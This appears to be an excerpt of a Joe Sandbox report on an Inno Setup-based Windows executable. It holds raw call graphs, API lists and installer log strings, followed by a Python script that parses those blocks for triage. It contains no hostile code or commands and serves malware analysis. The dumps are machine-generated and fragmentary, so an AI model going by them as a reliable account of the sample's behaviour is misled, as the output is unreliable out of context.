API calls 51544->51547 51545 48c7e0 SendNotifyMessageA 51636 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51545->51636 51546 48c851 51638 446830 18 API calls 51546->51638 51547->51610 51558 48c92c 51550->51558 51559 48c8e7 51550->51559 51640 446830 18 API calls 51551->51640 51553 48c85e 51639 446830 18 API calls 51553->51639 51554 48c89f 51641 446830 18 API calls 51554->51641 51557 48c869 SendMessageA 51561 446b0c 5 API calls 51557->51561 51566 48c93b 51558->51566 51567 48c98e 51558->51567 51644 446830 18 API calls 51559->51644 51560 48c8ac 51642 446830 18 API calls 51560->51642 51561->51619 51564 48c8f3 51645 446830 18 API calls 51564->51645 51565 48c8b7 PostMessageA 51643 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51565->51643 51570 44688c 18 API calls 51566->51570 51575 48c99d 51567->51575 51576 48ca15 51567->51576 51573 48c948 51570->51573 51571 48c900 51646 446830 18 API calls 51571->51646 51577 42e1f0 2 API calls 51573->51577 51574 48c90b SendNotifyMessageA 51647 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51574->51647 51579 44688c 18 API calls 51575->51579 51586 48ca4a 51576->51586 51587 48ca24 51576->51587 51580 48c955 51577->51580 51581 48c9ac 51579->51581 51582 48c96b GetLastError 51580->51582 51583 48c95b 51580->51583 51648 446830 18 API calls 51581->51648 51584 446b0c 5 API calls 51582->51584 51585 446b0c 5 API calls 51583->51585 51589 48c969 51584->51589 51585->51589 51594 48ca59 51586->51594 51595 48ca7c 51586->51595 51653 446830 18 API calls 51587->51653 51591 446b0c 5 API calls 51589->51591 51590 48ca2e FreeLibrary 51654 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51590->51654 51591->51610 51597 44688c 18 API calls 51594->51597 51604 48ca8b 51595->51604 51609 48cabf 51595->51609 51596 48c9bf GetProcAddress 51598 48c9cb 51596->51598 51599 48ca05 51596->51599 51600 48ca65 51597->51600 51649 446830 18 API calls 51598->51649 51652 446964 LocalAlloc TlsSetValue 
TlsGetValue TlsGetValue VariantClear 51599->51652 51607 48ca6d CreateMutexA 51600->51607 51603 48c9d7 51650 446830 18 API calls 51603->51650 51655 4869a8 18 API calls 51604->51655 51607->51610 51608 48c9e4 51613 446b0c 5 API calls 51608->51613 51609->51610 51657 4869a8 18 API calls 51609->51657 51610->51494 51612 48ca97 51614 48caa8 OemToCharBuffA 51612->51614 51615 48c9f5 51613->51615 51656 4869c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51614->51656 51651 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51615->51651 51618 48cada 51620 48caeb CharToOemBuffA 51618->51620 51619->51610 51658 4869c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51620->51658 51622->51491 51623->51508 51624->51513 51625->51518 51626->51525 51627->51516 51628->51521 51629->51527 51630->51536 51631->51619 51632->51526 51633->51534 51634->51538 51635->51545 51636->51610 51637->51546 51638->51553 51639->51557 51640->51554 51641->51560 51642->51565 51643->51619 51644->51564 51645->51571 51646->51574 51647->51610 51648->51596 51649->51603 51650->51608 51651->51619 51652->51619 51653->51590 51654->51610 51655->51612 51656->51610 51657->51618 51658->51610 48141 41edc4 48142 41edd3 IsWindowVisible 48141->48142 48143 41ee09 48141->48143 48142->48143 48144 41eddd IsWindowEnabled 48142->48144 48144->48143 48145 41ede7 48144->48145 48148 402648 48145->48148 48147 41edf1 EnableWindow 48147->48143 48149 40264c 48148->48149 48150 402656 48148->48150 48149->48150 48152 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48149->48152 48150->48147 48150->48150 48152->48150 51659 49292c 51713 403344 51659->51713 51661 49293a 51716 4056a0 51661->51716 51663 49293f 51719 4098b4 51663->51719 51667 492949 51729 4108c4 51667->51729 51669 49294e 51733 412898 51669->51733 51671 492958 51738 418fb0 GetVersion 51671->51738 51976 4032fc 51713->51976 51715 403349 GetModuleHandleA GetCommandLineA 51715->51661 51718 4056db 51716->51718 51977 4033bc LocalAlloc 
TlsSetValue TlsGetValue TlsGetValue 51716->51977 51718->51663 51978 408f8c 51719->51978 51728 409ae8 6F571CD0 51728->51667 51730 4108ce 51729->51730 51731 41090d GetCurrentThreadId 51730->51731 51732 410928 51731->51732 51732->51669 52058 40ae6c 51733->52058 51737 4128c4 51737->51671 52070 41dd94 8 API calls 51738->52070 51740 418fc9 52072 418ea8 GetCurrentProcessId 51740->52072 51976->51715 51977->51718 51979 408c24 5 API calls 51978->51979 51980 408f9d 51979->51980 51981 408544 GetSystemDefaultLCID 51980->51981 51984 40857a 51981->51984 51982 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51982->51984 51983 406d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51983->51984 51984->51982 51984->51983 51985 4084d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 51984->51985 51986 4085dc 51984->51986 51985->51984 51987 406d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51986->51987 51988 4084d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 51986->51988 51989 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51986->51989 51990 40865f 51986->51990 51987->51986 51988->51986 51989->51986 51991 403420 4 API calls 51990->51991 51992 408679 51991->51992 51993 408688 GetSystemDefaultLCID 51992->51993 52050 4084d0 GetLocaleInfoA 51993->52050 51996 403450 4 API calls 51997 4086c8 51996->51997 51998 4084d0 5 API calls 51997->51998 51999 4086dd 51998->51999 52000 4084d0 5 API calls 51999->52000 52001 408701 52000->52001 52056 40851c GetLocaleInfoA 52001->52056 52004 40851c GetLocaleInfoA 52005 408731 52004->52005 52006 4084d0 5 API calls 52005->52006 52007 40874b 52006->52007 52008 40851c GetLocaleInfoA 52007->52008 52009 408768 52008->52009 52010 4084d0 5 API calls 52009->52010 52011 408782 52010->52011 52012 403450 4 API calls 52011->52012 52013 40878f 52012->52013 52014 4084d0 5 API calls 52013->52014 52015 4087a4 52014->52015 52016 403450 4 API calls 52015->52016 52017 4087b1 52016->52017 52018 40851c 
GetLocaleInfoA 52017->52018 52019 4087bf 52018->52019 52020 4084d0 5 API calls 52019->52020 52021 4087d9 52020->52021 52022 403450 4 API calls 52021->52022 52023 4087e6 52022->52023 52024 4084d0 5 API calls 52023->52024 52025 4087fb 52024->52025 52026 403450 4 API calls 52025->52026 52027 408808 52026->52027 52028 4084d0 5 API calls 52027->52028 52029 40881d 52028->52029 52030 40883a 52029->52030 52031 40882b 52029->52031 52033 403494 4 API calls 52030->52033 52032 403494 4 API calls 52031->52032 52034 408838 52032->52034 52033->52034 52035 4084d0 5 API calls 52034->52035 52036 40885c 52035->52036 52037 408879 52036->52037 52038 40886a 52036->52038 52039 403400 4 API calls 52037->52039 52040 403494 4 API calls 52038->52040 52041 408877 52039->52041 52040->52041 52042 403634 4 API calls 52041->52042 52043 40889b 52042->52043 52044 403634 4 API calls 52043->52044 52045 4088b5 52044->52045 52046 403420 4 API calls 52045->52046 52047 4088cf 52046->52047 52048 408fd8 GetVersionExA 52047->52048 52049 408fef 52048->52049 52049->51728 52051 4084f7 52050->52051 52052 408509 52050->52052 52053 4034e0 4 API calls 52051->52053 52054 403494 4 API calls 52052->52054 52055 408507 52053->52055 52054->52055 52055->51996 52057 408538 52056->52057 52057->52004 52059 40ae73 52058->52059 52059->52059 52060 40ae92 52059->52060 52069 40ada4 19 API calls 52059->52069 52062 410f7c 52060->52062 52063 410f9e 52062->52063 52064 406d54 5 API calls 52063->52064 52065 403450 4 API calls 52063->52065 52066 410fbd 52063->52066 52064->52063 52065->52063 52067 403400 4 API calls 52066->52067 52068 410fd2 52067->52068 52068->51737 52069->52059 52071 41de0e 52070->52071 52071->51740 52088 407828 52072->52088 52089 40783b 52088->52089 52090 407520 19 API calls 52089->52090 52091 40784f GlobalAddAtomA GetCurrentThreadId 52090->52091 48153 42e24b SetErrorMode 48154 41fac8 48155 41fad1 48154->48155 48158 41fd6c 48155->48158 48157 41fade 48159 41fe5e 48158->48159 48160 41fd83 48158->48160 48159->48157 
48160->48159 48179 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 48160->48179 48162 41fdb9 48163 41fde3 48162->48163 48164 41fdbd 48162->48164 48189 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 48163->48189 48180 41fb0c 48164->48180 48167 41fdf1 48169 41fdf5 48167->48169 48170 41fe1b 48167->48170 48173 41fb0c 10 API calls 48169->48173 48174 41fb0c 10 API calls 48170->48174 48171 41fb0c 10 API calls 48172 41fde1 48171->48172 48172->48157 48175 41fe07 48173->48175 48176 41fe2d 48174->48176 48177 41fb0c 10 API calls 48175->48177 48178 41fb0c 10 API calls 48176->48178 48177->48172 48178->48172 48179->48162 48181 41fb27 48180->48181 48182 41f8ac 4 API calls 48181->48182 48183 41fb3d 48181->48183 48182->48183 48190 41f8ac 48183->48190 48185 41fb85 48186 41fba8 SetScrollInfo 48185->48186 48198 41fa0c 48186->48198 48189->48167 48209 418150 48190->48209 48192 41f8c9 GetWindowLongA 48193 41f906 48192->48193 48194 41f8e6 48192->48194 48212 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 48193->48212 48211 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 48194->48211 48197 41f8f2 48197->48185 48199 41fa1a 48198->48199 48200 41fa22 48198->48200 48199->48171 48201 41fa61 48200->48201 48202 41fa51 48200->48202 48208 41fa5f 48200->48208 48214 417db8 IsWindowVisible ScrollWindow SetWindowPos 48201->48214 48213 417db8 IsWindowVisible ScrollWindow SetWindowPos 48202->48213 48204 41faa1 GetScrollPos 48204->48199 48206 41faac 48204->48206 48207 41fabb SetScrollPos 48206->48207 48207->48199 48208->48204 48210 41815a 48209->48210 48210->48192 48211->48197 48212->48197 48213->48208 48214->48208 48215 420508 48216 42051b 48215->48216 48236 415aa0 48216->48236 48218 420662 48219 420679 48218->48219 48243 414644 KiUserCallbackDispatcher 48218->48243 48220 420690 48219->48220 48244 414688 KiUserCallbackDispatcher 48219->48244 48226 4206b2 48220->48226 48245 41ffd0 12 API calls 48220->48245 48221 4205c1 48241 4207b8 20 API calls 
48221->48241 48222 420556 48222->48218 48222->48221 48229 4205b2 MulDiv 48222->48229 48227 4205da 48227->48218 48242 41ffd0 12 API calls 48227->48242 48240 41a274 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 48229->48240 48232 4205f7 48233 420613 MulDiv 48232->48233 48234 420636 48232->48234 48233->48234 48234->48218 48235 42063f MulDiv 48234->48235 48235->48218 48237 415ab2 48236->48237 48246 4143e0 48237->48246 48239 415aca 48239->48222 48240->48221 48241->48227 48242->48232 48243->48219 48244->48220 48245->48226 48247 4143fa 48246->48247 48250 4105b8 48247->48250 48249 414410 48249->48239 48253 40de04 48250->48253 48252 4105be 48252->48249 48254 40de66 48253->48254 48257 40de17 48253->48257 48260 40de74 48254->48260 48258 40de74 19 API calls 48257->48258 48259 40de41 48258->48259 48259->48252 48261 40de84 48260->48261 48263 40de9a 48261->48263 48272 40d740 48261->48272 48292 40e1fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48261->48292 48275 40e0ac 48263->48275 48266 40d740 5 API calls 48267 40dea2 48266->48267 48267->48266 48268 40df0e 48267->48268 48278 40dcc0 48267->48278 48270 40e0ac 5 API calls 48268->48270 48271 40de70 48270->48271 48271->48252 48293 40eb68 48272->48293 48301 40d61c 48275->48301 48310 40e0b4 48278->48310 48283 40eacc 5 API calls 48284 40dd09 48283->48284 48285 40dd24 48284->48285 48286 40dd1b 48284->48286 48291 40dd21 48284->48291 48326 40db38 48285->48326 48329 40dc28 19 API calls 48286->48329 48330 403420 48291->48330 48292->48261 48296 40d8e0 48293->48296 48299 40d8eb 48296->48299 48297 40d74a 48297->48261 48299->48297 48300 40d92c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48299->48300 48300->48299 48302 40eb68 5 API calls 48301->48302 48303 40d629 48302->48303 48304 40d63c 48303->48304 48308 40ec6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48303->48308 48304->48267 48306 40d637 48309 40d5b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48306->48309 
Strings
• Time stamp of existing file: %s, xrefs: 0046C453
• Dest file is protected by Windows File Protection., xrefs: 0046C315
• Failed to read existing file's MD5 sum. Proceeding., xrefs: 0046C6F8
• Existing file is a newer version. Skipping., xrefs: 0046C62A
• Couldn't read time stamp. Skipping., xrefs: 0046C75D
• User opted not to overwrite the existing file. Skipping., xrefs: 0046C875
• Existing file has a later time stamp. Skipping., xrefs: 0046C7F7
• @, xrefs: 0046C1D8
• Same time stamp. Skipping., xrefs: 0046C77D
• Existing file's MD5 sum matches our file. Skipping., xrefs: 0046C6DD
• Dest file exists., xrefs: 0046C3E3
• Skipping due to "onlyifdoesntexist" flag., xrefs: 0046C3F6
• .tmp, xrefs: 0046C9DF
• Time stamp of our file: (failed to read), xrefs: 0046C3CF
• InUn, xrefs: 0046CB6D
• Stripped read-only attribute., xrefs: 0046C8EF
• Version of existing file: (none), xrefs: 0046C722
• Non-default bitness: 64-bit, xrefs: 0046C2D7
                                                                          • -- File entry --, xrefs: 0046C123
                                                                          • Version of our file: %u.%u.%u.%u, xrefs: 0046C518
                                                                          • Same version. Skipping., xrefs: 0046C70D
                                                                          • Time stamp of existing file: (failed to read), xrefs: 0046C45F
                                                                          • Existing file's MD5 sum is different from our file. Proceeding., xrefs: 0046C6EC
                                                                          • Incrementing shared file count (64-bit)., xrefs: 0046CF97
                                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046C814
                                                                          • , xrefs: 0046C5F7, 0046C7C8, 0046C846
                                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0046C5A4
                                                                          • Dest filename: %s, xrefs: 0046C2BC
                                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046C8BE
                                                                          • Will register the file (a DLL/OCX) later., xrefs: 0046CF2A
                                                                          • UF, xrefs: 0046D11F
                                                                          • Time stamp of our file: %s, xrefs: 0046C3C3
                                                                          • Uninstaller requires administrator: %s, xrefs: 0046CB9D
                                                                          • Installing the file., xrefs: 0046C931
                                                                          • Incrementing shared file count (32-bit)., xrefs: 0046CFB0
                                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046C922
                                                                          • Version of our file: (none), xrefs: 0046C524
                                                                          • Failed to strip read-only attribute., xrefs: 0046C8FB
                                                                          • Will register the file (a type library) later., xrefs: 0046CF1E
                                                                          • Non-default bitness: 32-bit, xrefs: 0046C2E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$UF$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                          • API String ID: 0-843965562
                                                                          • Opcode ID: 3aa41980a51285452c5a719ab75ef6ba90a455b0b06de281e8ec642f8d67b5cd
                                                                          • Instruction ID: 2c976b8502b68867d0ce509d0e418c852ac65d8e3c14b9799468bf735a09a243
                                                                          • Opcode Fuzzy Hash: 3aa41980a51285452c5a719ab75ef6ba90a455b0b06de281e8ec642f8d67b5cd
                                                                          • Instruction Fuzzy Hash: A5926430E042489FCB11DFA5C495BEDBBB5AF09304F5440ABE844AB392E7789E45CF5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph: function 00423B7C (nodes span 00423B7C-004240E7; rendered graph omitted). Windows APIs reached on the graph: IsIconic, GetFocus, SetFocus, IsWindowEnabled, IsWindowVisible, SendMessageA, PostMessageA; every other node is an internal call (e.g. 00423AD8, 0040B3AC, 00418150, 00423AF4).
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7873e9bd340cf6d7e9cfa7a0788c35c3dc5b9db54546344555b68b7d46e3100b
                                                                          • Instruction ID: 7115e30b2d35316c82e91109ae6d6d6b504554527cf119b6ec0a5d38efd5eaef
                                                                          • Opcode Fuzzy Hash: 7873e9bd340cf6d7e9cfa7a0788c35c3dc5b9db54546344555b68b7d46e3100b
                                                                          • Instruction Fuzzy Hash: 88E19A30B00124EBC710DF69E585A5EB7B0FF48704FA441AAE645AB352CB7DEE81DB09
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph: function 004637D4 (nodes span 004637D4-00464EDE; rendered graph omitted). Direct Windows API calls on the graph: LoadBitmapA, GetSystemMenu, AppendMenuA (twice); all remaining nodes are internal calls (e.g. 0048F6B4, 00402B30, 0041456C, 00414A88, 00462CAC, 004650B4, 00476F14, 0040B3AC).
                                                                          APIs
                                                                            • Part of subcall function 0048F804: GetWindowRect.USER32(00000000), ref: 0048F81A
                                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00463BA3
                                                                            • Part of subcall function 0041D620: GetObjectA.GDI32(?,00000018,00463BBD), ref: 0041D64B
                                                                            • Part of subcall function 00463630: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004636CD
                                                                            • Part of subcall function 00463630: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004636F3
                                                                            • Part of subcall function 00463630: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046374F
                                                                            • Part of subcall function 00463630: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463775
                                                                            • Part of subcall function 00462FEC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00463C58,00000000,00000000,00000000,0000000C,00000000), ref: 00463004
                                                                            • Part of subcall function 0048FA60: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0048FA6A
                                                                            • Part of subcall function 0048F754: 73A1A570.USER32(00000000,?,?,?), ref: 0048F776
                                                                            • Part of subcall function 0048F754: SelectObject.GDI32(?,00000000), ref: 0048F79C
                                                                            • Part of subcall function 0048F754: 73A1A480.USER32(00000000,?,0048F7FA,0048F7F3,?,00000000,?,?,?), ref: 0048F7ED
                                                                            • Part of subcall function 0048FA50: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0048FA5A
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02130464,021320B8,?,?,021320E8,?,?,02132138,?), ref: 0046481B
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046482C
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00464844
                                                                            • Part of subcall function 00429FCC: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00429FE2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$AppendExtractFileIconInfoObject$A480A570BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
                                                                          • String ID: $(Default)$STOPIMAGE
                                                                          • API String ID: 1965080796-770201673
                                                                          • Opcode ID: 852b161cdb0dace639722325e252d42721c2c4ef680a80770af8d8d997e53459
                                                                          • Instruction ID: a97045497617a37e73d7fe25ec91c7d2f949ac95d49f9cf5c1555c71fec600f2
                                                                          • Opcode Fuzzy Hash: 852b161cdb0dace639722325e252d42721c2c4ef680a80770af8d8d997e53459
                                                                          • Instruction Fuzzy Hash: C9F2D5386005119FCB00EB69D8D9F9973F5BF89304F1542B6E5049B36AD778EC4ACB8A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?,?,00000000), ref: 0047A4AC
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?), ref: 0047A4F5
                                                                          • FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D), ref: 0047A502
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?), ref: 0047A54E
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047A61B,?,00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000), ref: 0047A5F7
                                                                          • FindClose.KERNEL32(000000FF,0047A622,0047A61B,?,00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000), ref: 0047A615
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 58c32b23aa8a6e90c09b165a63e98b8d05e69813d422197aa64ba14eba77b4ae
                                                                          • Instruction ID: df6970a490733c3fc08b9eb15c5b52ce16d10e4af30c9d3b25a464b00084d34d
                                                                          • Opcode Fuzzy Hash: 58c32b23aa8a6e90c09b165a63e98b8d05e69813d422197aa64ba14eba77b4ae
                                                                          • Instruction Fuzzy Hash: FE516F71900648AFCB11EF65CC45ADEB7BCEB88319F1084BAA408E7341D6389F55CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
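The "Strings" list of the file-entry routine and the "APIs" lists of the Find* routines above only become useful once ordered and grouped: sorting the string xrefs by address recovers the order of the checks the routine performs (dest file exists, "onlyifdoesntexist", Windows File Protection, version, time stamp, MD5, read-only attribute), and counting APIs per module separates the function's own calls from those it reaches through subcalls. These strings and the "unins???.*" pattern are the logging of the Inno Setup installer stub's file-copy and uninstaller-lookup routines, so keeping them apart from the payload's own behaviour is the point of the exercise. The Python parser below is an added example, not part of the Joe Sandbox report or its IDA plugin; the excerpt it parses is constructed from lines of this page, and the triage tag table is an assumption of the example.

```python
"""Parse the per-function 'APIs' and 'Strings' blocks of a Joe Sandbox
function dump into structured records, then order the string xrefs by
address so the routine's check sequence can be read back from its log strings."""
import re
from collections import Counter

# Excerpt constructed from the report text above so the script runs offline.
SAMPLE = """\
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004707D5
• FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708B2
• FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708C0
  • Part of subcall function 0048F804: GetWindowRect.USER32(00000000), ref: 0048F81A
Strings
• Dest file exists., xrefs: 0046C3E3
• Skipping due to "onlyifdoesntexist" flag., xrefs: 0046C3F6
• , xrefs: 0046C5F7, 0046C7C8, 0046C846
• Version of existing file: %u.%u.%u.%u, xrefs: 0046C5A4
Memory Dump Source
"""

# "• [Part of subcall function XXXX: ]Api.MODULE(args), ref: XXXX"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• text, xrefs: XXXX[, XXXX...]"  (text may be empty, as in the report)
STR_RE = re.compile(
    r"^\s*•\s*(?P<s>.*),\s*xrefs:\s*(?P<x>[0-9A-Fa-f]+(?:\s*,\s*[0-9A-Fa-f]+)*)\s*$"
)


def parse_dump(text):
    """Return (apis, strings). The headings 'APIs' / 'Strings' switch the
    parser; any other non-bullet line (e.g. 'Memory Dump Source') ends it."""
    apis, strings, section = [], [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in ("APIs", "Strings"):
            section = stripped
            continue
        if not stripped.startswith("•"):
            section = None
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                apis.append({
                    "api": m["api"],
                    "module": m["mod"],
                    "args": [a.strip() for a in m["args"].split(",")] if m["args"] else [],
                    "ref": int(m["ref"], 16),
                    "subcall": int(m["sub"], 16) if m["sub"] else None,
                })
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                xrefs = [int(x.strip(), 16) for x in m["x"].split(",")]
                strings.append({"text": m["s"], "xrefs": xrefs})
    return apis, strings


def strings_in_address_order(strings):
    """Flatten to (address, text) pairs sorted by address: the order in which
    the log strings are referenced, which mirrors the routine's check order."""
    return sorted((x, s["text"]) for s in strings for x in s["xrefs"])


def api_summary(apis, direct_only=True):
    """Count (module, api) pairs; by default subcall lines are excluded so the
    result reflects the function's own imports."""
    counts = Counter()
    for a in apis:
        if direct_only and a["subcall"] is not None:
            continue
        counts[(a["module"], a["api"])] += 1
    return counts


# Triage tags are an assumption of this example, not data from the report.
TAGS = {
    "FindFirstFileA": "file-enumeration",
    "FindNextFileA": "file-enumeration",
    "FindClose": "file-enumeration",
    "GetWindowRect": "ui",
}


def tag_apis(apis):
    """Distinct triage tags for every API seen (subcalls included)."""
    return sorted({TAGS.get(a["api"], "untagged") for a in apis})


if __name__ == "__main__":
    apis, strings = parse_dump(SAMPLE)
    for addr, text in strings_in_address_order(strings):
        print(f"{addr:08X}  {text!r}")
    for (mod, api), n in sorted(api_summary(apis).items()):
        print(f"{mod}!{api} x{n}")
    print("tags:", tag_apis(apis))
```

Feed the script a whole report dump rather than the excerpt and the address-ordered string list for the routine at 0046C123 reads as the check sequence itself, from "-- File entry --" down to "Installing the file."; the empty strings with several xrefs (0046C5F7, 0046C7C8, 0046C846) are format separators and are kept so that the gaps between checks stay visible.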

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004707D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708B2
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
